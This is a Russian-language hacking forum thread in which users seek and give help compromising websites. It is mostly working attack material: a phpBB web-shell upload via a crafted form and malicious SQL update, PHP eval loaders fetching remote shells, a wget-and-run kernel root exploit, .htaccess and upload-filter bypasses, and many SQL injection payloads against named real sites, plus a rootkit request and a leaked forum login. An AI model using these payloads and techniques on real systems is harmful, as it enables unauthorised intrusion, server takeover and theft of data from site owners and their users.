как вариант можно попробовать впихнуть код через восстановление базы данных в форуме:
eval(file_get_contents($_GET['e']));
а потом обращаться
http://site.com/images/sh.php?e=http://адресс_до_шела

З.Ы или как Ctacok посоветовал, это проще)

И как же этот код на сервер запихнуть?

GOGA075

с текстом тоже самое

Ну тут 2 варианта.
Либо что то нетак сделал, либо админ сервера закрыл урлы в cmd!

я ни так хорошо понял версию Ctacok

куда нужно ставить эту форму аплоада ??

Konqi попробуй через иклуид!

GOGA075 ты Эйнштейн. :)

как можно было забыть такое!! :)

shell загрузилось без каких либо проблем ;)

я ни так хорошо понял версию Ctacok

куда нужно ставить эту форму аплоада ??


1. создаёшь у себя на компе 1.html
2. засовываешь туда

<form action="http://your_site.ru/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=/home/z/u/zucchini/public_html/forum/images/avatars/htaccess.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>

3. создаёшь 1.sql
4. суёшь туда

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval($_GET[cmd])' WHERE username='USERNAME';

5. открываешь через браузер 1.html
6. выбираешь шелл
7. жмёшь upload
8. проверяешь, http://your_site.ru/forum/images/avatars/htaccess.php

так ясно? %)

А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!

Ребят, помогите залить шелл через двойной запрос.
Не могу залить т.к magic_quotes = on

?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+mysql.user--

выводится 2 и 8. file_priv = Y

Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается

Ребят, помогите залить шелл через двойной запрос.
Не могу залить т.к magic_quotes = on

?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+mysql.user--

выводится 2 и 8. file_priv = Y

Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается


load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)



А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!


посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.

нашел уязвимость "вставление пхп кода":PHP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение .
как можно етим воспользоватса?
еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо

скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?

load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)






посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.

у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.

p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex

скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?

http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz

wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run

у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.

p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex


прав нет значит на файлы. Если текст запроса в случае ошибки не выводится, то проэксплуатировать "двойной запрос" будет сложно - если только подбирать варианты, и это в случае если действительно есть два и\или более запроса

подниму вопрос свой

А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!

Как можно незаметно затроянить сайт есть доступ к БД что можно там написать что бы сайт попал под потанцеально опасные для пользователя сайты в выдачи поискавика.

подниму вопрос свой

А не легче ли поправить хешь админа потом зайти под его правами и дать себе полномочия.

Есть файл .htaccess
в нем

<Files *>
Order Allow,Deny
Alow from All
</Files>

из-за него выдает ошибку 500 какуюто.

Нужно шоб файлл shell.php читался свободно!

Есть файл .htaccess
в нем

<Files *>
Order Allow,Deny
Alow from All
</Files>

из-за него выдает ошибку 500 какуюто.

Нужно шоб файлл shell.php читался свободно!


<Files *.php>
Order Allow,Deny
Alow from All
</Files>

попугай
да там все файлы .php

<Files shell.php>
Order Allow,Deny
Alow from All
</Files>

какой руткит под линукс посоветуете? какой лучше и не палится?

попугай а так пишет что пра не хватает!

На сайте есть загрузка pdf,doc,jpg файлов.

Заливаю шелл: shell.php
Выводит такую ошибку: shell.php already exists

Пробую так: shell.php.pdf
Выводит: shell.php.pdf already exists

Как здесь обойти фильтрацию?

asdklhasdjasdjkasdhjkasdhdkhhasdas.php уплоадь.

http://www.acforum.net/index.php?pid=40&lang=1

username:Neil Kirkman
password:neilk

Здесь реально залить шелл?

На сайте есть загрузка pdf,doc,jpg файлов. Заливаю шелл: shell.php Выводит такую ошибку: shell.php already exists Пробую так: shell.php.pdf Выводит: shell.php.pdf already exists Как здесь обойти фильтрацию?

1. Можно тупо вставить код php в jpg
2. Поколдавать с %00

http://www.acforum.net/index.php?pid=40&lang=1

username:Neil Kirkman
password:neilk

Здесь реально залить шелл?

Да, выслал в ПМ

http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file('/var/www/test/htdocs/browse_classifieds.php'),2,3%20/*

Подправьте пожалуйста запрос для скачки /var/www/test/htdocs/browse_classifieds.php
данного файла

Да, выслал в ПМ

Thanks!

http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file('/var/www/test/htdocs/browse_classifieds.php'),2,3%20/* Подправьте пожалуйста запрос для скачки /var/www/test/htdocs/browse_classifieds.php данного файла

вы имеете в виду magic_quotes_gpc=on
тогда
http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file(0x2f7661722f7777772f74657 3742f6874646f63732f62726f7773655f636c6173736966696 564732e706870),2,3%20/*

есть сервер Linux 2.6.18-028stab057.4 #1 SMP Fri Aug 1 10:47:59 MSD 2008 i686 GNU/Linux
при запуске эксплойта http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz пишется ошибка:
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Socket type not supported
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
ядро пропатчено?!

вы имеете в виду magic_quotes_gpc=on
тогда
http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file(0x2f7661722f7777772f74657 3742f6874646f63732f62726f7773655f636c6173736966696 564732e706870),2,3%20/*
мм, можно поподробней причем magic_quotes и почему меняются буквы на код?

нашел уязвимость "вставление пхп кода":PHP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение .
как можно етим воспользоватса?
еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо
не забывайте про меня пожалуйсто

мм, можно поподробней причем magic_quotes и почему меняются буквы на код?
magic_quotes экранирует спецсимволы (',",null,/), в данном случае одиночные кавычки, чтобы читать файлы конструкцией load_file необходимо их наличие, для обхода экранизации используеться Sql Hex

мм, можно поподробней причем magic_quotes и почему меняются буквы на код?
http://ru.php.net/get_magic_quotes_gpc


/var/www/test/htdocs/browse_classifieds.php
=>
0x2f7661722f7777772f746573742f6874646f63732f62726f 7773655f636c6173736966696564732e706870
=>
union+select+load_file(0x2f7661722f7777772f7465737 42f6874646f63732f62726f7773655f636c617373696669656 4732e706870)

при соответствующих правах

magic_quotes экранирует кавычки, чтобы читать файлы конструкцией load_file наличие их обязательно
кавычки не обязательны
для обхода этой фильтрации
это не фильтрация
используеться Sql Hex кодировка
это не кодировка

Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?

есть сервер Linux 2.6.18-028stab057.4 #1 SMP Fri Aug 1 10:47:59 MSD 2008 i686 GNU/Linux
при запуске эксплойта http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz пишется ошибка:

ядро пропатчено?!
Проверь: сайт судя по айпи хостится на mediatemple.com? Если да, то мне их openvz ядра пробить ничем не удалось.

Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?

- пробовать расширения .phtml, .php3 и т.д.
- мешает .htaccess, определить какой, если в images удалить, если в корне, в images залить свой, в нем разрешить выполнение с нужным расширеним, по типу
AddType application/x-httpd-php .php .phtml .jpg

- пробовать расширения .phtml, .php3 и т.д.
- мешает .htaccess, определить какой, если в images удалить, если в корне, в images залить свой, в нем разрешить выполнение с нужным расширеним, по типу
AddType application/x-httpd-php .php .phtml .jpg

php3,php5,phtml,shtml,html,htm не канают...был бы доступ к .htaccess , вопросов бы небыло

Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?

Языки тоже не правятся? Хотя скорее всего да, иначе ты бы не написал бы пост...

В джамуле некоторые пути до пхп файлов (которые инклудятся двигом), а точнее до дир лежат в бд. И возможно тебе удастся проинклудить шелл, который сам по себе не выполняется. Запросы к бд выполняй через восстановление БД (запихиваешь нужный запрос в файл, к примеру 1.sql). В путях, скорее всего, имени пхп файла не будет и скорее всего везде будет инклудиться index.php, но тут должен помочь %00 (mq = on не помешает, т.к. запрос будет лежать в загружаемом файле).

Посмотри вот это: https://forum.antichat.ru/showpost.php?p=697864&postcount=10 (там нечто похожее описывалось)
+ скачай двиг и потестируй все на локалке, иначе все убьешь в мгновение, да и после успешного выполнения двиг нормально работать не будет - нужно будет быстро перезалить шелл и все вернуть на место.

как правильно составить запрос?
SELECT * FROM mobiticket.structure_page WHERE tag = '53' AND status = 'active'

пробую так
page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,' 10

пишет
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '53' union select 1,2,3,4,5,6,7,8,9,'10' AND status = 'active' failed with error 1054: Unknown column 'status' in 'field list'

53'+union+select+1,2,3,4,5,6,7,8,9,10--+

53'+union+select+1,2,3,4,5,6,7,8,9,10--+
все равно пишет Unknown column 'status' in 'field list'

Попробуй /* вместо --+

Попробуй /* вместо --+
ошибка
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '53' union select 1,2,3,4,5,6,7,8,9,10/*' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND status = 'active'' at line 4

ошибка
нуллбайт попробуй :D

--
/*
%23
{

вот так попробывал
page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,1 0+union+select+1,2,3,4,5,6,7,8,9,'10

SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '53' union select 1,2,3,4,5,6,7,8,9,10 union select 1,2,3,4,5,6,7,8,9,'10' AND status = 'active' failed with error 1222: The used SELECT statements have a different number of columns

когда видимо подобрал, вылетает

Unknown column 'status' in 'field list'

http://rzd.sclub.ru/page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,' 10/*+--+%2B{
И правда, экранирование никакое не раюотает =\

http://rzd.sclub.ru/page.php?page=53'/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+and+'1'='1

Duplicate column name '5.0.87-log'

Короче, крутите как слепую.

Попробуй /* вместо --+
Короче, крутите как слепую.

По поводу первого - начиная с пятой версии (5.0.какая то, не помню точно) мускула, нельзя оставлять комментарий открытым, а следовательно и использовать его не вариант.

По поводу второго - очевидно, что если строка не обрубается комментарием -- 1, то значит запрос многострочечный.
Решить это очень просто - обращаемся к той же таблице, что и первоначальный запрос, но колонки уже - произвольные данные. Далее используем where 1=1 or '1'='1 В результате вывод не будет зависеть от условия, а открытая кавычка закроется другой.

http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6 ,7,8,user(),10,11,12,13,14,15,16,17,18+from+mobiti cket.structure_page+where+1=1+or+'1'='1

Обращение к другой таблице - через запятую:

from mobiticket.structure_page, bla_bla_bla

Грей, ты мой Бог :(

Эм, а как там с лимитами?><

Высший класс! Спасибо)

Эм, а как там с лимитами?><

Или через where указывая номер записи или на месте выводимой колонки юзать подзапрос.

P.S. но при желание можно и лимиты юзать, тогда еще одно объединение запроса нужно:

http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6 ,7,8,version(),10,11,12,13,14,15,16,17,18+from НУЖНА ТАБЛИЦА а тут лимиты))+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18+from+mobiticket.structure_p age+where+'2'='1

Огромное спасибо :)

напримепь есть саыт xxx.com/news.php?id=2

кояда зделаеш ххх.com/news.php?id=2

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'tw'' at line 1

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/twt/public_html/cp/lib/db.php on line 28


а кояда ххх.com/news.php?id=2+union+select+0

Forbidden

You don't have permission to access /browse.php on this server.

что зделать ?

ххх.com/news.php?id=2/*!+union+select+0*/
попробовать, это объод WAF

http://oragir.am/news.php?id=13/*!+union+select+0*/

ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как
cmd=eval(file_get_contents( выдает error

allow_url_fopen = on
allow_url_include= off

команды bash нормально работают,

на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел.

есть идеи?

ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как
cmd=eval(file_get_contents( выдает error

allow_url_fopen = on
allow_url_include= off

команды bash нормально работают,

на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел.

есть идеи?
Конечно. Помимо file_get_contents в пхп еще много функций, от мув_аплоадед_файл() до system(), etc.

Хелп! ...если это вообще возможно... :rolleyes:
есть скуля:
/?id='')or+(select+count(*)+from+information_schema .tables+group+by+concat((select+(concat(table_sche ma,':',table_name))+from+information_schema.column s+where+column_name+like+'%pass%'+limit+0,1),floor (rand(0)*2)))+--+

имеем Duplicate entry 'a1323:tbladmin1' for key 1

база a1323, табла tbladmin

а тут:

/?id='')UNION+SELECT*from+(SELECT+*+FROM+tbladmin+J OIN+tbladmin+b)a+--+

выводит такую ошибку
Table 'a1323.TBLADMIN' doesn't exist

дело в том, что там id переводится в апперкейс.
возможно ли как-то с этим бороться? хексы, чары и прочие известные мне приблуды в FROM не годятся. значит должны быть НЕизвестные...
а? что скажете, господа :rolleyes:

ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как
cmd=eval(file_get_contents( выдает error

allow_url_fopen = on
allow_url_include= off

команды bash нормально работают,

на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел.

есть идеи?

cmd=copy($_GET[aa],$_GET[bb]);&aa=http://you_site.ru/shell.txt&bb=путь куда заливать шелл

не смог =(...
http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777

не смог =(...
http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777
там походу нет инъекции.

у меня тут тоже пару подсобралось
http://www.colorlines.com/article.php?ID=681'
http://thetvdb.com/index.php?tab=series&id=79771'
http://www.worstpreviews.com/headline.php?id=15683

не получилось раскрутить

2BrainDeaD
http://www.colorlines.com/article.php?ID=681+and+substring(@@version,1,1)=4+--
крути как блинд

1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(), 1,1)=4

2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2)a)--+

3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version (),1,1)=5

#1221 - Incorrect usage of UNION and ORDER BYкак бороться?
limit , второй параметр...

2Strilo4ka дай посмотреть плз

2Strilo4ka дай посмотреть плз
:) двиг 102 атрибута, и второй параметр в лимите.
не скажу.

up

вот:
(SELECT 1 FROM (select 1 union select 2)x order by 1 limit 0,1) union (select 1) Showing rows 0 - 0 (1 total, Query took 0.0009 sec)SELECT 1 FROM (select 1 union select 2)x order by 1 limit 0,1 union select 1#1221 - Incorrect usage of UNION and ORDER BY

Понятно что скобки, то не поставить... Идеи?

1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(), 1,1)=4

2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2)a)--+

3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version (),1,1)=5

странно, 1 и 3 ничего не выводит, или я что-то недопонял.

Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).

Объясните, почему?

2BrainDeaD, прочти сначала о blind sql injection https://forum.antichat.ru/thread35207-blind+sql+injection.html
https://forum.antichat.ru/thread18552-blind+sql+injection.html

спасибо. у меня ещё много недочётов в знаниях. будем исправляться.

Это фильтрация. Если я включу эту опцию, чтобы закрыть возможность провести инжу в запросе, хотя это и не совсем полный подход, но это все равно будет фильтрация.
Фильтрация - удаление взвешенного вещества из массы воды путем прохождения через слой пористого материала или через сетки с подходящим размером отверстий.

Грубо говоря, если мы имеем ввиду компьютерную тематику в общем, и хек тематику в частности, фильтрация - удаление символов. Меджик квотс ничего не удаляет, она экранирует

Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).

Объясните, почему?
значит это не LFI, а fopen или file_get_contents

значит это не LFI, а fopen или file_get_contents

Я умею отличать LFI от остального. Я же написал!
Каждый раз, когда преписка cgi, php код не интерпритируется!

wildshaman:
ххх.com/news.php?id=2/*!+union+select+0*/
попробовать, это объод WAF

Lokbatanli:
http://oragir.am/news.php?id=13/*!+union+select+0*/
up..pomoqite pojalsuta

up..pomoqite pojalsuta
Там похоже нужна закрывающая кавычка, а magic quotes- on, поэтому фильтрация селекта тебя не должна особо интересовать.

v1d0qz
Зря на Анжелику наезжаешь, m_q_gpc не фильтрация. Вот preg_replace(), вырезающий кавычки - то фильтрация.

список не раскрученных инъекций =(:

http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'
http://www.scottishfuturestrust.org.uk/news.asp?id=1'
http://www.ncm.org.uk/news.asp?id=1'

может кто раскрутит =))...

Я умею отличать LFI от остального. Я же написал!
Каждый раз, когда преписка cgi, php код не интерпритируется!
показать пример где интерпритируется? Эта приписка всего лишь определяет что php работает как CGI, а не как модуль апача
Ты б ещё привела пример:
Люди чистят картошку, чтобы не жрать её со шкурной, но применяется и другая фильтрация, это картошка в мундирке. Бредовые сравнения и вообще большинство твоих мессаг в которых ты хочешь "тонко" намекнуть, что кто-то глупее тебя. Не одобряю!
зы. Выставить сиськи на показ, не значит что они у тебя самые большущие и красивющие! Этот ход вообще большой минус!
Мозгом надо работать. Фильтрация - это отсеивание определенных символом, например если бы в защите использовалась функция preg(ereg)_replace и тп - это была бы фильтрация, а magic_quotes - это экранирование. Не путай термины - эту ветку читают новички, они потом и будут ходить и говорить что MQ-это фильтрация
А в этом плане я действительно больше понимаю чем ты, уж извини

Там похоже нужна закрывающая кавычка, а magic quotes- on, поэтому фильтрация селекта тебя не должна особо интересовать.

v1d0qz
Зря на Анжелику наезжаешь, m_q_gpc не фильтрация. Вот preg_replace(), вырезающий кавычки - то фильтрация.
откуда magic ON ?

а здесь к чему филтрасия ?
и вообше что здeлать тут ?

v1d0qz, ты просто не понимаешь семантику слова "фильтрация".
Когда говорят "фильтрация" в голове возникает образ чего-то, проходящего отбор или отсев. При фильтрации материи или сущности, этой сущности становится меньше, из нее забирают что-либо.

Magic Quotes добавляет, а не отнимает.

v1d0qz, ты просто не понимаешь семантику слова "фильтрация".
Когда говорят "фильтрация" в голове возникает образ чего-то, проходящего отбор или отсев. При фильтрации материи или сущности, этой сущности становится меньше, из нее забирают что-либо.

Magic Quotes добавляет, а не отнимает.
Magic_quotes - экранирование (c) capitan!
А фильтрация бывает разная, чёрная, белая, красная...

first sorry for my English

i don't speak Russian fluently

i was asking about

1- how to bypass php filter on uploading image is there is

any way to bypass i know the ways of live http header and tamper data and so on

what if site changes name from upload.php to 111.gif ????

is there is any way to bypass

_http://sng.by/articles/1.html
можно тут че заимутить? = \

_http://sng.by/articles/1.html
можно тут че заимутить? = \
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+version()),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+.html

first sorry for my English

i don't speak Russian fluently

i was asking about

1- how to bypass php filter on uploading image is there is

any way to bypass i know the ways of live http header and tamper data and so on

what if site changes name from upload.php to 111.gif ????

is there is any way to bypass
1111.gif.php
1111.gif%00.php - Know triggered or not

http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+version()),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+.html
Помогите кто довести до ума плз)
а то я в таких скул не шарю = \ \ \ \

Помогите кто довести до ума плз)
а то я в таких скул не шарю = \ \ \ \
Всё примерно так же как и в обычной:
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+table_name+from+information_schema.tables+li mit+19,1),floor(rand(0)*2))+from+information_schem a.tables+group+by+2)a)--+.html
Стандартно ищешь нужные таблицы лимитом,потом колонки итд.

проблема такая....
есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql
...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ...
хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится
И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql.
подскажите как сделать

проблема такая....
есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql
...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ...
хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится
И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql.
подскажите как сделать
AND (id='1237176' or id='12323781') union select 1,2,3,4,... etc.
# - %23 :)

AND (id='1237176' or id='12323781') union select 1,2,3,4,... etc.
# - %23 :)

так не получится. Я же писал, что параметр разбивается на части по запятым.

и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
то получится такая фигня :
name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
т.к. присутствуют запятые

и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?

и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?

проскань порты
mysql 3306

можешь попробовать
http://site.com:3306/

так не получится. Я же писал, что параметр разбивается на части по запятым.

и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
то получится такая фигня :
name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
т.к. присутствуют запятые

и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23

Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23

Это вроде помогает, хотя еще не понятно. но теперь хотя бы на количество столбцов ругается, а не на синтаксис. Возможно просто считает это одним столбцом.

Объясни пожалуйста что это за строка такая, и как её самому собирать.

А база похоже PostgreSQL....

Это вроде помогает, хотя еще не понятно. но теперь хотя бы на количество столбцов ругается, а не на синтаксис. Возможно просто считает это одним столбцом.

Объясни пожалуйста что это за строка такая, и как её самому собирать.

А база похоже PostgreSQL....
http://ctacok.ru/he.php?c=union%20select%201,2,3,4,5,6,7,8
http://ctacok.ru/he.php?c=order%20by%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30
Вбиваешь:
0x6f7264657220627920312c322c332c342c352c362c372c38 2c392c31302c31312c31322c31332c31342c31352c31362c31 372c31382c31392c32302c32312c32322c32332c32342c3235 2c32362c32372c32382c32392c333
Какая ошибка вылезет, отнимаешь один, и вот тебе кол-во столбцов.
Ex:
если ошибка с числом 25, то колонок 24 :)
Ну ты понел чо дальше делать

Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23

вобщем так тоже не прокатывает. База воспринимает эту строку значение одного столбца. Может быть конечно я что то не то делаю...
Столбцов там 3, вычислил с помощью order by. (order by 3 - так работает, а так order by 4 уже нет )

Как же мне запятые спрятать?

вобщем так тоже не прокатывает. База воспринимает эту строку значение одного столбца. Может быть конечно я что то не то делаю...
Столбцов там 3, вычислил с помощью order by. (order by 3 - так работает, а так order by 4 уже нет )

Как же мне запятые спрятать?
только скобки попробуй заюзать. Не могу найти статью об этом.

Но там что-то типа script.php?id=N(union)(select)(1)(2)

Если не прав поправьте



вот
https://forum.antichat.ru/threadnav125796-2-10.html


конкретно, https://forum.antichat.ru/showpost.php?p=1734851&postcount=13

только скобки попробуй заюзать. Не могу найти статью об этом.

Но там что-то типа script.php?id=N(union)(select)(1)(2)

Если не прав поправьте
Да да так идёт.
Кстате ехал в автобусе вспомнил про вывод через ошибку.
Пробуй через вывод ошибок. Правдо каждый раз хексить ... :)

Выручайте. крутил вертел - этот кубик рубик не собрал
http:// dragonar. biz/ news.php?pg=1
Может кто разрулит php или sql - отпишитесь по результатам.

Выручайте. крутил вертел - этот кубик рубик не собрал
http:// dragonar. biz/ news.php?pg=1
Может кто разрулит php или sql - отпишитесь по результатам.
http://dragonar.biz/news.php?pg=-123
Страница(-123):1
http://dragonar.biz/news.php?pg=-23abcd
Страница(-23):1

=> intval ()

Я так понял ничего не выйдет. :mad:

Да

http://dragonar.biz/news.php?pg=-123
Страница(-123):1
http://dragonar.biz/news.php?pg=-23abcd
Страница(-23):1

=> intval ()
Я так понял ничего не выйдет. :mad:

Да да так идёт.
Кстате ехал в автобусе вспомнил про вывод через ошибку.
Пробуй через вывод ошибок. Правдо каждый раз хексить ... :)

нет со скобками не получилось.
Я так понял union без запятых не сделать. Эта задачка мне не под силу. (((( Спасибо за содействие, но я сдаюсь

А что за метод через вывод ошибок? Бегло поискал описание, но не нашел.

нет со скобками не получилось.
Я так понял union без запятых не сделать. Эта задачка мне не под силу. (((( Спасибо за содействие, но я сдаюсь

А что за метод через вывод ошибок? Бегло поискал описание, но не нашел.
https://forum.antichat.ru/showpost.php?p=1796647&postcount=20

http://warcastle.ru/database_miss.php?id=-25
кстати вот еще сайтец. 23 поля раньше было. все канало.
а теперь толи прикрыли дыру толи чё, понять немогу.

Ну сам то думай, если ты раньше это смог сделать, сейчас нет?
Естественно залатали, или ппробуй потыкай +-10 столбцов.

http://warcastle.ru/database_miss.php?id=-25
кстати вот еще сайтец. 23 поля раньше было. все канало.
а теперь толи прикрыли дыру толи чё, понять немогу.

похоже прикрыли, никак не удается влиять на запрос

Я так понял ничего не выйдет. :mad:


там нет скули, походу. Просто ошибка в скрипте, наверное база пустая.

может кто поможет =)) никак не смог раскрутить

http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'
http://www.scottishfuturestrust.org.uk/news.asp?id=1'
http://www.ncm.org.uk/news.asp?id=1'

иль не раскручиваемые инъекции???

2 pinch

http://www.scottishfuturestrust.org.uk/news.asp?id=(SELECT+top+1+table_name+from+informat ion_schema.tables)--

http://www.scottishfuturestrust.org.uk/news.asp?id=(SELECT+top+1+table_name+from+informat ion_schema.tables)--

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near 'SEL'.
/news.asp, line 83

хммм.... у меня не катит...

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near 'SEL'.
/news.asp, line 83

near SEL

table_name= SEL ;)

o sorry :( не прав

